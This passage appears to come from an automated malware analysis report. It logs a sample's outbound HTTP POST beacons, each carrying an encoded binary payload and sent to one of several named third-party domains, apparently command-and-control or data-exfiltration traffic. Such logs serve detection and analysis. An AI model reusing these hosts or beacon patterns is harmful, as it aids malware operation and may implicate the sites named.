61 65 78 62 30 42 62 4c 43 41 31 59 49 6c 62 6c 78 64 33 76 79 79 6e 4a 33 37 44 4c 4e 31 65 2b 6b 7a 51 46 55 43 70 44 47 36 41 71 44 70 47 59 75 58 44 44 6b 57 45 64 55 5a 66 66 31 72 74 79 4a 71 67 6a 75 4a 50 53 71 35 50 34 2b 6b 33 45 74 44 30 78 6d 32 69 58 77 79 41 66 73 69 6b 56 62 54 42 76 77 51 52 2b 4c 65 70 47 4d 43 31 6a 52 61 69 69 58 6a 5a 43 7a 42 54 55 59 50 42 45 69 62 4f 30 51 30 76 42 7a 76 58 53 36 75 6c 61 43 78 52 4a 45 6d 57 6f 67 59 79 54 38 31 43 61 72 34 68 33 42 4c 67 75 68 34 2b 52 6b 70 6a 33 6c 59 31 67 78 43 53 76 6d 33 38 70 72 66 4f 39 72 63 4b 34 49 30 6d 38 53 66 48 37 38 67 66 70 49 68 31 32 4f 35 64 66 38 4f 63 39 6d 5a 45 76 72 77 6f 75 6d 71 70 2b 6a 44 69 31 68 48 6a 30 67 65 4e 79 2b 4c 31 4b 2b 48 36 42 52 72 61 36 6a 63 32 61 30 33 41 72 75 39 45 50 39 70 4b 56 35 6e 39 6f 3d Data Ascii: H/l+5A/eHvtArrP8rjTx+BgnxhKlo7fCswbrPYTxplsk2GQ/a27pibgPavo9kGYnSkqpHLGcmY117teW/mE32LRRdwqyu+WU5ObPg6tq2YhJzn2XU9hT5JbjNdVYHGzI1i9c3uYisNU4W9uaxQdF9yulwkxuAcnB94+lPkk3j5gHICR9+BdAZR0iZUoWh6ZejSZ5gUWHitBqI6Mkv0COuP2wDQLQoKyiOqt1ySpnRiCmf63Wgd8JUu3eyZ3tPkM1IGa681/GSeXt+HLHetJSPv/b7qvt5Ieaexb0BbLCA1YIlblxd3vyynJ37DLN1e+kzQFUCpDG6AqDpGYuXDDkWEdUZff1rtyJqgjuJPSq5P4+k3EtD0xm2iXwyAfsikVbTBvwQR+LepGMC1jRaiiXjZCzBTUYPBEibO0Q0vBzvXS6ulaCxRJEmWogYyT81Car4h3BLguh4+Rkpj3lY1gxCSvm38prfO9rcK4I0m8SfH78gfpIh12O5df8Oc9mZEvrwoumqp+jDi1hHj0geNy+L1K+H6BRra6jc2a03Aru9EP9pKV5n9o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 4c 6e 2b 63 47 64 50 6e 4b 50 73 4b 6d 4b 2b 50 6d 73 74 37 37 58 77 46 79 58 4f 35 53 74 58 78 74 36 49 50 31 45 75 6b 59 71 68 55 31 4f 43 2b 50 70 55 72 4d 73 70 4e 4a 4c 55 39 49 4a 74 62 30 49 7a 39 38 49 53 6f 4d 54 58 6c 4b 6b 6b 74 6b 68 44 30 46 48 5a 6b 6f 52 68 75 6f 52 39 50 69 42 64 32 58 38 61 78 66 4a 38 70 6a 59 56 4b 4f 74 54 52 4d 62 51 33 36 43 32 69 50 45 4d 51 54 2f 57 50 51 6c 4d 37 46 62 44 39 47 5a 41 44 54 48 42 57 57 58 76 79 59 35 55 41 6c 79 35 4e 65 4c 4d 4f 2b 5a 43 39 51 44 4a 41 77 66 58 55 43 42 57 79 56 65 2b 53 66 53 4a 55 53 42 58 63 42 72 59 6c 61 65 35 57 38 77 61 32 64 56 75 4b 51 62 37 66 45 79 63 44 67 4a 49 6f 4e 72 55 72 30 55 62 42 45 4c 49 75 79 69 4b 78 49 63 42 75 63 5a 4d 53 4a 41 67 69 73 52 63 78 79 59 6a 68 76 48 43 59 65 35 2f 37 56 76 34 36 38 7a 41 67 6c 48 39 6f 6c 62 30 71 4b 33 4f 50 57 74 57 70 38 31 75 62 4a 75 4c 4d 30 42 6d 78 38 70 75 35 64 75 31 62 6a 5a 55 58 6f 6d 5a 6f 38 50 55 4e 44 35 2f 34 71 4a 52 69 4c 74 52 6c 4b 6c 43 52 71 50 63 56 51 7a 69 68 69 74 4e 30 35 31 4e 30 47 63 32 56 6b 56 78 6b 4f 4e 34 76 48 42 67 57 4a 72 59 6e 4e 71 62 53 4f 66 52 4c 52 7a 6d 4f 32 65 47 37 50 44 70 4a 6f 76 6e 4b 50 68 33 41 4f 38 36 70 52 35 64 6d 52 73 77 76 44 77 74 73 78 68 6f 67 45 78 7a 37 33 68 66 2f 36 71 31 46 48 44 30 54 2f 6b 45 45 4d 67 53 37 57 4c 5a 33 5a 6b 44 33 30 6c 49 63 33 39 30 35 30 6a 4f 45 66 31 4b 38 2b 65 4e 67 6e 59 6c 41 65 4f 69 73 78 52 4e 59 30 38 4d 7a 55 6e 4b 6f 62 49 57 78 6a 6e 34 58 4c 63 56 61 48 32 6e 4d 5a 50 2b 56 76 48 55 61 39 4f 69 52 72 31 75 49 76 38 4c 2f 6b 31 43 55 51 49 6c 48 62 2f 67 51 4a 31 75 66 66 72 54 34 41 45 61 41 4d 68 6b 62 35 6e 37 2f 55 70 4a 46 48 38 6b 3d Data Ascii: Ln+cGdPnKPsKmK+Pmst77XwFyXO5StXxt6IP1EukYqhU1OC+PpUrMspNJLU9IJtb0Iz98ISoMTXlKkktkhD0FHZkoRhuoR9PiBd2X8axfJ8pjYVKOtTRMbQ36C2iPEMQT/WPQlM7FbD9GZADTHBWWXvyY5UAly5NeLMO+ZC9QDJAwfXUCBWyVe+SfSJUSBXcBrYlae5W8wa2dVuKQb7fEycDgJIoNrUr0UbBELIuyiKxIcBucZMSJAgisRcxyYjhvHCYe5/7Vv468zAglH9olb0qK3OPWtWp81ubJuLM0Bmx8pu5du1bjZUXomZo8PUND5/4qJRiLtRlKlCRqPcVQzihitN051N0Gc2VkVxkON4vHBgWJrYnNqbSOfRLRzmO2eG7PDpJovnKPh3AO86pR5dmRswvDwtsxhogExz73hf/6q1FHD0T/kEEMgS7WLZ3ZkD30lIc39050jOEf1K8+eNgnYlAeOisxRNY08MzUnKobIWxjn4XLcVaH2nMZP+VvHUa9OiRr1uIv8L/k1CUQIlHb/gQJ1uffrT4AEaAMhkb5n7/UpJFH8k=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 63 34 33 62 49 77 4d 39 4b 66 76 6a 76 31 2f 65 43 6a 34 68 59 53 79 47 48 6f 57 70 2f 77 6f 51 35 7a 4c 4e 46 4f 45 76 6a 30 70 44 56 52 78 2b 76 70 55 74 74 73 4c 6e 58 2b 6e 4c 48 4a 75 50 4a 36 4e 2b 58 35 4b 46 56 44 44 4a 45 46 68 67 6d 55 66 69 6d 78 6f 59 6e 49 6a 78 57 49 78 4d 38 45 63 54 56 78 73 30 4e 62 7a 2f 70 6c 4f 47 47 38 37 6d 68 63 63 6c 75 6c 6e 4d 38 30 39 61 56 38 31 67 31 4f 77 46 75 6a 43 6a 71 30 43 37 53 34 6e 4c 49 65 50 5a 63 53 4d 48 39 48 6a 53 6b 47 44 64 5a 68 68 46 48 58 37 46 49 48 32 35 48 2f 6a 5a 76 4e 57 45 6a 39 34 5a 57 64 6a 78 48 45 59 64 54 74 6e 55 44 35 2b 39 36 49 38 48 2b 64 42 46 4f 6f 65 65 6b 54 34 4a 67 46 33 71 57 38 4c 43 39 54 69 34 33 62 65 75 6a 2f 75 4a 5a 33 51 4b 53 44 70 43 67 53 6e 58 72 46 59 63 4a 37 79 4a 55 70 4c 36 64 62 68 42 67 77 33 47 35 43 37 76 33 55 4c 65 46 35 4a 6e 2b 56 68 41 76 68 34 31 71 4a 49 79 37 71 30 37 31 6d 62 38 51 4a 52 67 78 47 79 50 51 51 41 34 34 73 44 33 74 45 2f 59 78 6f 76 6c 79 55 37 41 6a 74 31 76 7a 53 6b 2f 36 70 58 6b 71 43 36 49 4a 64 76 33 6b 75 51 44 61 31 51 75 55 67 63 74 6d 41 59 57 51 71 47 58 62 35 54 72 58 76 6b 57 62 6f 33 48 61 62 4d 77 48 5a 4e 69 4a 79 56 6b 64 4f 6e 38 4a 75 44 46 73 53 58 4c 54 59 70 6c 44 57 33 46 5a 67 78 37 35 64 4e 33 35 37 4d 6b 4e 56 74 41 6b 51 78 54 74 65 35 43 78 6a 2f 4f 64 66 50 41 6e 34 4e 59 6e 38 74 31 53 43 6e 67 6e 31 49 4b 71 55 6b 6a 50 52 50 56 6f 5a 55 30 42 65 65 57 51 41 51 70 6f 4e 4d 74 4b 47 66 64 4b 67 64 72 52 52 58 4b 76 43 79 71 46 6c 79 35 64 69 45 47 34 30 75 6c 6c 47 75 52 5a 5a 6e 6f 4f 7a 49 63 71 69 32 4b 34 30 4f 61 4b 70 62 54 50 34 6f 63 64 49 6c 41 67 33 66 79 77 56 4e 72 61 54 63 7a 56 36 6f 54 2f 34 68 65 64 38 52 37 72 71 31 47 77 37 57 30 48 5a 4d 43 41 43 6f 6e 78 55 45 41 51 72 2b 56 Data Ascii: c43bIwM9Kfvjv1/eCj4hYSyGHoWp/woQ5zLNFOEvj0pDVRx+vpUttsLnX+nLHJuPJ6N+X5KFVDDJEFhgmUfimxoYnIjxWIxM8EcTVxs0Nbz/plOGG87mhcclulnM809aV81g1OwFujCjq0C7S4nLIePZcSMH9HjSkGDdZhhFHX7FIH25H/jZvNWEj94ZWdjxHEYdTtnUD5+96I8H+dBFOoeekT4JgF3qW8LC9Ti43beuj/uJZ3QKSDpCgSnXrFYcJ7yJUpL6dbhBgw3G5C7v3ULeF5Jn+VhAvh41qJIy7q071mb8QJRgxGyPQQA44sD3tE/YxovlyU7Ajt1vzSk/6pXkqC6IJdv3kuQDa1QuUgctmAYWQqGXb5TrXvkWbo3HabMwHZNiJyVkdOn8JuDFsSXLTYplDW3FZgx75dN357MkNVtAkQxTte5Cxj/OdfPAn4NYn8t1SCngn1IKqUkjPRPVoZU0BeeWQAQpoNMtKGfdKgdrRRXKvCyqFly5diEG40ullGuRZZnoOzIcqi2K40OaKpbTP4ocdIlAg3fywVNraTczV6oT/4hed8R7rq1Gw7W0HZMCAConxUEAQr+V
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 608User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 44 64 50 42 4d 5a 43 77 4b 66 76 6e 43 69 69 4c 49 30 72 32 31 30 4e 36 79 61 43 34 4d 67 5a 72 78 4f 44 34 44 32 74 2f 6e 4c 4d 51 7a 33 4e 48 52 69 77 68 4f 4d 34 58 41 31 4e 66 48 52 53 45 74 58 6b 6a 38 47 6d 45 71 44 50 78 36 69 79 34 56 43 74 2b 5a 69 48 38 4f 37 54 47 35 41 64 53 70 71 53 32 6d 2f 57 62 53 38 36 43 2b 62 65 48 57 6c 4d 69 2b 6f 4f 5a 2b 2f 79 73 4f 73 65 6a 31 7a 46 35 7a 37 62 43 50 78 48 64 49 57 51 49 68 64 2f 48 72 77 41 67 36 6b 51 68 52 78 64 74 69 58 74 65 42 51 35 49 75 74 54 58 37 6b 5a 56 6e 52 71 62 67 31 6b 78 47 36 72 6b 75 49 72 63 35 41 74 37 41 62 45 6f 2b 4b 37 77 52 71 43 5a 31 65 43 4f 56 4f 59 41 6d 6a 6c 31 34 2b 78 53 6e 55 31 38 6c 45 7a 43 69 41 4b 32 41 7a 30 72 52 34 61 54 2b 6b 6e 69 62 64 66 70 30 67 59 46 39 70 48 49 6a 71 61 6d 4d 79 6b 7a 56 50 5a 54 38 4a 4b 39 41 58 4b 38 75 69 6b 2b 75 72 49 30 71 72 71 72 52 78 72 6c 45 6f 6f 6d 31 42 2f 55 68 5a 2f 57 6b 6f 70 41 4a 64 34 5a 61 38 2f 35 61 4f 7a 4a 4b 62 47 6b 6d 48 68 5a 43 35 44 52 4e 61 5a 66 7a 35 58 70 59 48 4e 77 71 42 77 67 73 71 32 75 72 6c 68 55 39 78 37 6f 43 54 4f 65 6b 65 79 36 37 7a 6e 71 37 67 42 79 6c 56 57 79 4e 4f 63 50 6d 4a 6b 54 2b 46 48 6a 33 4e 4d 2f 6e 5a 2f 72 77 44 49 6d 45 6d 46 77 68 75 2b 6a 4b 78 43 76 70 2f 30 6d 31 34 70 4e 69 79 69 74 75 6d 44 51 59 41 59 77 6a 42 59 4b 43 38 61 39 58 43 48 53 42 6a 78 30 31 50 36 38 79 46 53 67 33 32 6c 73 4f 47 62 72 57 51 5a 42 6a 57 42 52 67 30 31 50 79 76 65 2b 50 66 39 6f 4a 4f 2b 57 41 58 54 2b 70 4d 66 58 34 32 77 68 4c 73 45 50 79 30 59 64 66 7a 4c 49 41 66 34 65 6c 37 51 6b 59 44 51 30 71 61 44 57 4d 6d 4c 46 64 65 4e 4b 66 44 65 4a 67 57 68 41 43 31 52 49 38 58 53 6b 33 69 50 69 49 58 37 79 31 42 58 38 37 7a 31 39 63 73 4c 4b 6f 6a 57 4d 64 48 42 38 79 72 5a 45 4d 67 2f 57 64 30 74 34 6a 7a 6a 46 6e 43 38 3d Data Ascii: DdPBMZCwKfvnCiiLI0r210N6yaC4MgZrxOD4D2t/nLMQz3NHRiwhOM4XA1NfHRSEtXkj8GmEqDPx6iy4VCt+ZiH8O7TG5AdSpqS2m/WbS86C+beHWlMi+oOZ+/ysOsej1zF5z7bCPxHdIWQIhd/HrwAg6kQhRxdtiXteBQ5IutTX7kZVnRqbg1kxG6rkuIrc5At7AbEo+K7wRqCZ1eCOVOYAmjl14+xSnU18lEzCiAK2Az0rR4aT+knibdfp0gYF9pHIjqamMykzVPZT8JK9AXK8uik+urI0qrqrRxrlEoom1B/UhZ/WkopAJd4Za8/5aOzJKbGkmHhZC5DRNaZfz5XpYHNwqBwgsq2urlhU9x7oCTOekey67znq7gBylVWyNOcPmJkT+FHj3NM/nZ/rwDImEmFwhu+jKxCvp/0m14pNiyitumDQYAYwjBYKC8a9XCHSBjx01P68yFSg32lsOGbrWQZBjWBRg01Pyve+Pf9oJO+WAXT+pMfX42whLsEPy0YdfzLIAf4el7QkYDQ0qaDWMmLFdeNKfDeJgWhAC1RI8XSk3iPiIX7y1BX87z19csLKojWMdHB8yrZEMg/Wd0t4jzjFnC8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 608User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 44 64 50 42 4d 5a 43 77 4b 66 76 6e 43 69 69 4c 49 30 72 32 31 30 4e 36 79 61 43 34 4d 67 5a 72 78 4f 44 34 44 32 74 2f 6e 4c 4d 51 7a 33 4e 48 52 69 77 68 4f 4d 34 58 41 31 4e 66 48 52 53 45 74 58 6b 6a 38 47 6d 45 71 44 50 78 36 69 79 34 56 43 74 2b 5a 69 48 38 4f 37 54 47 35 41 64 53 70 71 53 32 6d 2f 57 62 53 38 36 43 2b 62 65 48 57 6c 4d 69 2b 6f 4f 5a 2b 2f 79 73 4f 73 65 6a 31 7a 46 35 7a 37 62 43 50 78 48 64 49 57 51 49 68 64 2f 48 72 77 41 67 36 6b 51 68 52 78 64 74 69 58 74 65 42 51 35 49 75 74 54 58 37 6b 5a 56 6e 52 71 62 67 31 6b 78 47 36 72 6b 75 49 72 63 35 41 74 37 41 62 45 6f 2b 4b 37 77 52 71 43 5a 31 65 43 4f 56 4f 59 41 6d 6a 6c 31 34 2b 78 53 6e 55 31 38 6c 45 7a 43 69 41 4b 32 41 7a 30 72 52 34 61 54 2b 6b 6e 69 62 64 66 70 30 67 59 46 39 70 48 49 6a 71 61 6d 4d 79 6b 7a 56 50 5a 54 38 4a 4b 39 41 58 4b 38 75 69 6b 2b 75 72 49 30 71 72 71 72 52 78 72 6c 45 6f 6f 6d 31 42 2f 55 68 5a 2f 57 6b 6f 70 41 4a 64 34 5a 61 38 2f 35 61 4f 7a 4a 4b 62 47 6b 6d 48 68 5a 43 35 44 52 4e 61 5a 66 7a 35 58 70 59 48 4e 77 71 42 77 67 73 71 32 75 72 6c 68 55 39 78 37 6f 43 54 4f 65 6b 65 79 36 37 7a 6e 71 37 67 42 79 6c 56 57 79 4e 4f 63 50 6d 4a 6b 54 2b 46 48 6a 33 4e 4d 2f 6e 5a 2f 72 77 44 49 6d 45 6d 46 77 68 75 2b 6a 4b 78 43 76 70 2f 30 6d 31 34 70 4e 69 79 69 74 75 6d 44 51 59 41 59 77 6a 42 59 4b 43 38 61 39 58 43 48 53 42 6a 78 30 31 50 36 38 79 46 53 67 33 32 6c 73 4f 47 62 72 57 51 5a 42 6a 57 42 52 67 30 31 50 79 76 65 2b 50 66 39 6f 4a 4f 2b 57 41 58 54 2b 70 4d 66 58 34 32 77 68 4c 73 45 50 79 30 59 64 66 7a 4c 49 41 66 34 65 6c 37 51 6b 59 44 51 30 71 61 44 57 4d 6d 4c 46 64 65 4e 4b 66 44 65 4a 67 57 68 41 43 31 52 49 38 58 53 6b 33 69 50 69 49 58 37 79 31 42 58 38 37 7a 31 39 63 73 4c 4b 6f 6a 57 4d 64 48 42 38 79 72 5a 45 4d 67 2f 57 64 30 74 34 6a 7a 6a 46 6e 43 38 3d Data Ascii: DdPBMZCwKfvnCiiLI0r210N6yaC4MgZrxOD4D2t/nLMQz3NHRiwhOM4XA1NfHRSEtXkj8GmEqDPx6iy4VCt+ZiH8O7TG5AdSpqS2m/WbS86C+beHWlMi+oOZ+/ysOsej1zF5z7bCPxHdIWQIhd/HrwAg6kQhRxdtiXteBQ5IutTX7kZVnRqbg1kxG6rkuIrc5At7AbEo+K7wRqCZ1eCOVOYAmjl14+xSnU18lEzCiAK2Az0rR4aT+knibdfp0gYF9pHIjqamMykzVPZT8JK9AXK8uik+urI0qrqrRxrlEoom1B/UhZ/WkopAJd4Za8/5aOzJKbGkmHhZC5DRNaZfz5XpYHNwqBwgsq2urlhU9x7oCTOekey67znq7gBylVWyNOcPmJkT+FHj3NM/nZ/rwDImEmFwhu+jKxCvp/0m14pNiyitumDQYAYwjBYKC8a9XCHSBjx01P68yFSg32lsOGbrWQZBjWBRg01Pyve+Pf9oJO+WAXT+pMfX42whLsEPy0YdfzLIAf4el7QkYDQ0qaDWMmLFdeNKfDeJgWhAC1RI8XSk3iPiIX7y1BX87z19csLKojWMdHB8yrZEMg/Wd0t4jzjFnC8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 50 75 77 66 74 68 43 38 44 50 76 58 51 67 39 67 6f 2b 43 53 62 4d 4d 4e 7a 69 6b 34 5a 42 38 41 52 4f 78 79 7a 74 77 50 73 54 36 62 2b 30 67 6a 41 6e 66 50 32 6f 5a 77 4c 66 7a 54 57 6c 54 73 4e 7a 78 7a 66 78 52 6b 48 41 49 4f 73 30 6c 53 70 35 6e 65 78 5a 78 35 68 6a 34 76 46 7a 34 51 51 43 6e 63 50 78 62 66 57 50 2b 41 76 2b 76 68 44 59 6d 49 4b 53 34 38 4b 36 49 58 70 66 35 68 66 63 78 35 66 52 2b 57 2f 67 46 49 34 6a 34 78 70 69 73 39 67 59 73 39 2b 4d 50 62 6f 43 79 59 4b 4b 44 6b 54 5a 36 32 67 41 77 63 78 51 71 31 77 32 74 6f 45 34 75 38 78 57 34 71 75 54 5a 7a 6f 50 79 6e 6c 36 48 73 73 39 4d 33 48 6a 45 59 35 67 71 4d 6e 70 30 69 63 67 38 64 59 33 6d 79 75 75 38 6d 76 2f 53 71 65 2f 39 4b 35 6c 46 37 42 56 74 77 47 52 32 50 47 36 77 47 35 51 4f 49 56 6f 72 35 72 75 42 46 43 35 57 77 6c 43 7a 47 69 52 36 33 42 48 43 6b 42 69 33 6f 62 54 75 6e 6f 44 4c 34 6a 66 42 61 44 41 6b 4b 43 68 37 6f 75 2f 63 5a 4f 4b 67 79 37 79 56 4e 52 68 2f 37 43 7a 50 2b 43 72 45 43 74 4d 37 30 71 69 2b 46 44 46 2b 68 41 70 57 64 4f 2b 78 4d 34 6c 36 7a 6b 38 46 4b 6f 51 41 6b 73 73 61 6b 48 41 53 56 2b 6f 59 4a 4c 6d 31 45 61 74 65 69 50 75 4d 76 78 30 37 33 50 53 54 6b 6e 64 46 78 75 6d 44 47 4e 73 64 52 76 55 63 73 73 36 33 49 53 79 65 4f 55 6f 64 30 4a 56 6c 38 6f 37 4b 39 64 77 54 56 50 62 34 35 71 68 45 55 74 42 44 4e 45 54 79 67 5a 4e 4d 77 35 44 58 73 6c 76 4c 6a 68 67 74 7a 37 48 4d 7a 76 55 39 33 6d 7a 67 42 36 71 59 65 74 30 70 31 37 49 6f 67 34 71 46 48 4f 6c 59 33 69 49 62 34 6b 6a 4b 2b 66 68 5a 42 41 69 69 71 73 6f 6b 59 4f 6f 6d 38 72 59 43 46 4f 4c 70 7a 53 6b 6b 67 59 65 39 6d 58 71 59 4b 4a 4d 71 4d 66 6b 65 55 46 47 78 43 55 53 58 43 37 35 2f 31 34 6e 76 6e 62 52 4e 50 78 44 6d 4b 41 6b 35 54 47 38 53 67 6e 76 6a 52 34 48 4d 62 5a 6d 62 34 30 61 35 41 72 6c 62 46 63 41 3d 3d Data Ascii: PuwfthC8DPvXQg9go+CSbMMNzik4ZB8AROxyztwPsT6b+0gjAnfP2oZwLfzTWlTsNzxzfxRkHAIOs0lSp5nexZx5hj4vFz4QQCncPxbfWP+Av+vhDYmIKS48K6IXpf5hfcx5fR+W/gFI4j4xpis9gYs9+MPboCyYKKDkTZ62gAwcxQq1w2toE4u8xW4quTZzoPynl6Hss9M3HjEY5gqMnp0icg8dY3myuu8mv/Sqe/9K5lF7BVtwGR2PG6wG5QOIVor5ruBFC5WwlCzGiR63BHCkBi3obTunoDL4jfBaDAkKCh7ou/cZOKgy7yVNRh/7CzP+CrECtM70qi+FDF+hApWdO+xM4l6zk8FKoQAkssakHASV+oYJLm1EateiPuMvx073PSTkndFxumDGNsdRvUcss63ISyeOUod0JVl8o7K9dwTVPb45qhEUtBDNETygZNMw5DXslvLjhgtz7HMzvU93mzgB6qYet0p17Iog4qFHOlY3iIb4kjK+fhZBAiiqsokYOom8rYCFOLpzSkkgYe9mXqYKJMqMfkeUFGxCUSXC75/14nvnbRNPxDmKAk5TG8SgnvjR4HMbZmb40a5ArlbFcA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 35 6b 53 34 48 54 70 61 4d 66 76 4f 45 31 6f 59 33 61 53 4e 64 33 32 54 41 63 71 71 31 70 5a 54 44 6d 44 42 4b 53 64 58 73 54 65 52 45 54 55 52 33 72 33 6f 74 58 6e 75 4d 50 72 48 6c 52 44 31 37 39 79 48 4e 5a 6e 31 45 73 67 78 75 35 53 68 34 53 4d 36 39 46 4e 6d 35 2f 4e 74 4b 49 72 41 62 67 78 4c 41 46 64 73 62 4f 56 4d 51 36 59 6c 6d 58 72 55 43 64 7a 35 49 36 74 43 32 4a 48 44 2f 65 48 6c 48 64 79 73 6a 47 52 73 67 33 6c 4b 72 65 7a 63 4c 66 6c 73 61 58 34 64 34 79 36 74 4b 54 79 4d 45 72 37 43 4b 63 4d 30 32 36 6a 5a 68 79 71 58 6a 5a 67 6a 77 59 2b 33 61 48 59 52 51 4e 54 36 77 6c 57 4c 4d 33 51 4a 67 70 2f 71 70 68 5a 2f 2f 71 64 47 4e 37 36 41 46 66 66 64 66 73 73 6f 45 6b 73 4d 30 33 32 61 4f 52 75 37 50 7a 5a 35 4c 69 75 6e 56 44 41 75 38 78 55 61 33 31 30 74 4b 38 35 47 4a 50 4b 38 31 42 30 5a 55 4b 7a 78 46 68 4e 4a 31 39 73 54 42 46 4a 77 4b 35 68 65 6e 66 52 69 75 6c 65 46 2b 53 58 4e 43 36 34 75 58 46 4f 4d 34 76 4a 66 64 53 4e 4c 38 75 53 79 44 49 44 7a 30 71 68 50 59 77 39 48 4d 32 37 39 75 77 65 4f 32 67 33 6b 72 71 72 76 7a 58 45 2f 42 4c 6b 38 70 59 2b 67 4d 77 6e 72 77 73 4c 79 43 39 68 45 57 6f 43 35 41 74 77 68 70 44 64 37 33 4e 51 78 32 55 79 35 6a 46 55 73 75 73 58 57 4c 73 6b 33 5a 44 74 43 59 66 4f 62 71 2b 30 58 49 43 52 6e 50 4f 68 68 4f 45 32 34 71 64 43 4c 35 6f 49 42 39 42 42 48 46 68 5a 44 4b 45 4c 6a 67 6e 74 62 7a 61 49 4f 6f 46 76 5a 4b 56 4e 71 51 74 59 6a 6e 53 45 53 31 39 64 53 6b 51 30 7a 31 4e 49 49 65 79 33 54 37 6d 34 4e 7a 71 72 32 71 64 38 47 4f 58 6f 69 65 67 4d 35 79 44 6d 38 38 73 69 4b 32 5a 39 71 59 73 6e 41 34 2f 6c 4f 76 64 33 6c 4b 57 54 53 6c 71 50 62 4c 37 6a 53 4f 79 6c 4d 6e 75 4b 36 77 65 65 4d 4a 51 42 43 41 41 37 36 67 42 44 6d 54 4c 67 4c 39 63 70 71 71 44 6e 65 58 51 4b 41 67 69 6e 7a 45 50 45 54 4c 67 3d 3d Data Ascii: 5kS4HTpaMfvOE1oY3aSNd32TAcqq1pZTDmDBKSdXsTeRETUR3r3otXnuMPrHlRD179yHNZn1Esgxu5Sh4SM69FNm5/NtKIrAbgxLAFdsbOVMQ6YlmXrUCdz5I6tC2JHD/eHlHdysjGRsg3lKrezcLflsaX4d4y6tKTyMEr7CKcM026jZhyqXjZgjwY+3aHYRQNT6wlWLM3QJgp/qphZ//qdGN76AFffdfssoEksM032aORu7PzZ5LiunVDAu8xUa310tK85GJPK81B0ZUKzxFhNJ19sTBFJwK5henfRiuleF+SXNC64uXFOM4vJfdSNL8uSyDIDz0qhPYw9HM279uweO2g3krqrvzXE/BLk8pY+gMwnrwsLyC9hEWoC5AtwhpDd73NQx2Uy5jFUsusXWLsk3ZDtCYfObq+0XICRnPOhhOE24qdCL5oIB9BBHFhZDKELjgntbzaIOoFvZKVNqQtYjnSES19dSkQ0z1NIIey3T7m4Nzqr2qd8GOXoiegM5yDm88siK2Z9qYsnA4/lOvd3lKWTSlqPbL7jSOylMnuK6weeMJQBCAA76gBDmTLgL9cpqqDneXQKAginzEPETLg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheData Raw: 75 56 6e 56 4e 78 54 6a 4b 66 76 65 65 34 44 74 37 33 50 39 32 6d 64 44 38 70 75 4d 67 63 41 51 69 46 6b 4e 77 69 66 37 77 42 54 6f 41 6f 52 54 2b 69 59 5a 75 73 74 73 50 61 33 59 45 49 36 68 6d 79 76 55 39 64 47 63 63 6a 6c 47 32 4b 46 53 4d 77 68 58 75 55 54 77 71 6a 4e 73 74 73 2f 47 42 66 36 50 54 44 66 69 79 2f 2f 76 43 4b 6e 75 64 63 54 4b 4f 4a 43 70 53 39 69 57 68 6f 4a 50 47 43 38 68 38 58 6f 50 61 6d 50 43 37 34 41 30 69 7a 70 49 75 41 37 50 4e 35 4d 6d 42 62 37 57 43 6f 35 56 58 35 6c 70 41 56 48 75 78 47 39 37 42 4b 38 36 39 39 31 4f 66 4b 2f 42 46 7a 6a 69 62 32 65 30 4e 44 42 51 33 76 43 69 2f 68 69 4a 30 77 67 50 44 53 2b 59 47 58 75 72 4c 49 68 46 78 61 62 30 45 74 45 5a 36 39 5a 76 37 53 32 57 42 39 51 63 61 4a 6e 56 30 41 65 52 36 6c 4a 36 79 4b 6a 59 44 4f 42 49 6b 74 74 76 4a 5a 41 2f 4e 64 48 45 56 62 4f 6c 73 5a 50 35 73 4f 42 74 2f 39 74 4c 54 51 30 58 36 34 34 46 5a 4a 33 6f 71 5a 43 6e 74 78 34 73 43 77 61 2f 74 70 70 71 42 47 65 50 6c 73 31 54 6e 62 2f 76 31 56 62 43 63 41 69 46 77 41 6b 4b 52 4d 39 77 51 50 79 4c 56 46 6f 2f 54 46 4c 69 78 65 73 36 57 71 42 64 7a 45 68 31 36 33 39 71 4c 4f 65 36 69 59 42 72 6f 47 53 55 7a 6b 72 64 7a 34 68 77 49 63 66 49 45 6c 53 2b 41 39 54 6b 38 58 59 53 6e 49 41 41 55 79 34 61 49 4a 47 71 55 4c 44 79 65 69 71 5a 39 33 43 79 53 45 36 68 67 69 4a 43 47 6d 73 33 75 77 50 79 68 33 72 73 64 68 34 74 41 65 4b 77 56 6a 77 45 34 6b 64 67 54 39 57 34 55 47 6a 54 32 4d 66 66 5a 34 47 4d 67 75 6a 6b 39 34 36 49 4d 77 49 47 42 77 7a 70 39 35 33 30 4a 44 47 7a 65 35 41 6c 61 6b 6f 57 46 69 4b 38 62 45 4c 41 2b 4c 2b 2f 52 71 55 69 63 43 53 39 67 66 53 54 39 66 50 7a 67 6a 56 48 65 43 31 5a 68 77 3d 3d Data Ascii: 